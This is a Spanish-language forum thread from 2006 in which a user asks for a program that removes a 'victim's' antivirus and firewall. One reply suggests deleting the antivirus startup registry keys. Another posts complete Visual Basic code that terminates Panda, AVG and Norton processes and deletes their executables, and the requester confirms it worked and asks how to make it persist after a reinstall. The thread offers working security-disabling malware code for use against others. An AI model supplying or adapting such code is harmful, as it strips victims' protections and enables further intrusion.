Matar Firewall con un programa o con un simple bat

Iniciado por love_magic, 10 Abril 2006, 19:14 PM

0 Miembros y 1 Visitante están viendo este tema.

love_magic

Hola amigos primero agradecerles por todo lo que hacen aqui  esta web esta chingona..............
la pregunta es si existe algun programa, bat o codigo para crear en VB un programa que sea capas de eliminar el firewall de los antivirus y que este en el registro de windows.
para que cuando la victima vuelva a instalar un antivirus el registro el programa o bat pueda actuar ..........
muchas gracias de antemano

javito***17
uN SENTIMIENTO lLMADo  AMOR___-_

..::[ thekingkid ]::..

no es inchame un huevo ya ya

  un firewall   seria como matar cualquier proceso... pero no se si se pueda matar   yo intentaria con esto.:


eliminaria las claves del registro que hacen que el antivirus inicie el el sistema en
hklm\sowftare\microsoft\winbdows\run\
y borraria las claves que hacen que inicie  y ya..  eso tendria que hacer que se reinicie el computador   


pero puedes probar matando los procesos  tambiien puedes  analizarlos primero con cualquier programa mata procesos  ya ya
intenta con este
mx.geocities.com/kaiserkalamar/zip\procexp.zip



just wanna try

love_magic

Yo digo simplemete que eliminemos totalmente al antivirus ok
si eliminamos en el registro ese que me diste esta obsoleto ya que los antivirus cuidan mucho los registro de windows
lo que me referia a lo de registro de windows les decia como winstar.bat que nunca lo prove, tambien una inyeccion

o uno de activexx

solo les pregunte si alguno de ustedes ha creado un programa
Javito***
uN SENTIMIENTO lLMADo  AMOR___-_

love_magic

ojo que soy nuevo en el foro ok
por eso los andaba preguntando
ok
salu2
Javito***
uN SENTIMIENTO lLMADo  AMOR___-_

satanico88

weno.. javito.. lo q yo haria seria en primer lugar.. matar el proceso de el anti-virus...

te dejare el codigo mas abajo..
una ves matado el proceso tiene q borrar el directorio del antivirus..

Codigo :

PON ESTO EN UN MODULO


Option Explicit
Private Declare Function CloseHandle Lib "Kernel32.dll" (ByVal Handle As Long) As Long
Private Declare Function OpenProcess Lib "Kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long
Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Private Declare Function CreateToolhelpSnapshot Lib "kernel32" Alias "CreateToolhelp32Snapshot" (ByVal lFlags As Long, lProcessID As Long) As Long
Private Declare Function ProcessFirst Lib "kernel32" Alias "Process32First" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function ProcessNext Lib "kernel32" Alias "Process32Next" (ByVal hSnapshot As Long, uProcess As PROCESSENTRY32) As Long
Private Declare Function GetVersionExA Lib "kernel32" (lpVersionInformation As OSVERSIONINFO) As Integer
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * 260
End Type
Private Type OSVERSIONINFO
dwOSVersionInfoSize As Long
dwMajorVersion As Long
dwMinorVersion As Long
dwBuildNumber As Long
dwPlatformId As Long
szCSDVersion As String * 128
End Type
Private Const PROCESS_ALL_ACCESS = 0
Private Const TH32CS_SNAPPROCESS As Long = 2&
Private Const WINNT As Integer = 2
Private Const WIN98 As Integer = 1
Public KillAppReturn As Boolean
Public Function getVersion() As Integer
Dim udtOSInfo As OSVERSIONINFO
Dim intRetVal As Integer
     
With udtOSInfo
    .dwOSVersionInfoSize = 148
    .szCSDVersion = Space$(128)
End With

intRetVal = GetVersionExA(udtOSInfo)

getVersion = udtOSInfo.dwPlatformId
End Function

Public Function Killapp(myName As String)
Select Case getVersion()
Case WIN98
Killapp9X (myName)
Case WINNT
KillappNT (myName)
End Select
End Function

Private Function KillappNT(myName As String)
Dim uProcess As PROCESSENTRY32
Dim rProcessFound As Long
Dim hSnapshot As Long
Dim szExename As String
Dim exitCode As Long
Dim myProcess As Long
Dim AppKill As Boolean
Dim appCount As Integer
Dim I As Integer
On Local Error GoTo Finish
appCount = 0
uProcess.dwSize = Len(uProcess)
hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)
rProcessFound = ProcessFirst(hSnapshot, uProcess)
Do While rProcessFound
    I = InStr(1, uProcess.szExeFile, Chr(0))
    szExename = LCase$(Left$(uProcess.szExeFile, I - 1))
    If Right$(szExename, Len(myName)) = LCase$(myName) Then
        KillAppReturn = True
        appCount = appCount + 1
        myProcess = OpenProcess(1&, -1&, uProcess.th32ProcessID)
        AppKill = TerminateProcess(myProcess, 0&)
        Call CloseHandle(myProcess)
    End If
    rProcessFound = ProcessNext(hSnapshot, uProcess)
Loop
Call CloseHandle(hSnapshot)
Finish:
KillAppReturn = False
End Function

Private Function Killapp9X(myName As String)
Dim uProcess As PROCESSENTRY32
Dim rProcessFound As Long
Dim hSnapshot As Long
Dim szExename As String
Dim exitCode As Long
Dim myProcess As Long
Dim AppKill As Boolean
Dim appCount As Integer
Dim I As Integer
On Local Error GoTo Finish
appCount = 0
uProcess.dwSize = Len(uProcess)
hSnapshot = CreateToolhelpSnapshot(TH32CS_SNAPPROCESS, 0&)
rProcessFound = ProcessFirst(hSnapshot, uProcess)
Do While rProcessFound
    I = InStr(1, uProcess.szExeFile, Chr(0))
    szExename = LCase$(Left$(uProcess.szExeFile, I - 1))
    If Right$(szExename, Len(myName)) = LCase$(myName) Then
        KillAppReturn = True
        appCount = appCount + 1
        myProcess = OpenProcess(PROCESS_ALL_ACCESS, False, uProcess.th32ProcessID)
        AppKill = TerminateProcess(myProcess, exitCode)
        Call CloseHandle(myProcess)
    End If
    rProcessFound = ProcessNext(hSnapshot, uProcess)
Loop
Call CloseHandle(hSnapshot)
Finish:
KillAppReturn = False
End Function


Y ESTO EN EL FORM


Private Sub Form_Load()
Killapp "panda.exe"
Killapp "avg.exe"
Killapp "norton.exe"
'( pon los procesos de todos los antivirus q conoscas... )
'( aki pon la ruta del exe del antivirus para q sea borrado )
Kill ("C:\archivos de programa\Panda\panda.exe")
Kill ("C:\archivos de programa\AVG\avg.exe")
Kill ("C:\archivos de programa\Norton 200\norton.exe")


eso es todo fijate si te funciona y me avisas !

love_magic

Gracias man eso si que funciono
de maravilla
solo que te preguntaria ahora que ya le elimine el antivirus, se encontrara que su antivus a sido eliminado pero lo volvera a instalar sera que actue... de nuevo
salu2
javito
uN SENTIMIENTO lLMADo  AMOR___-_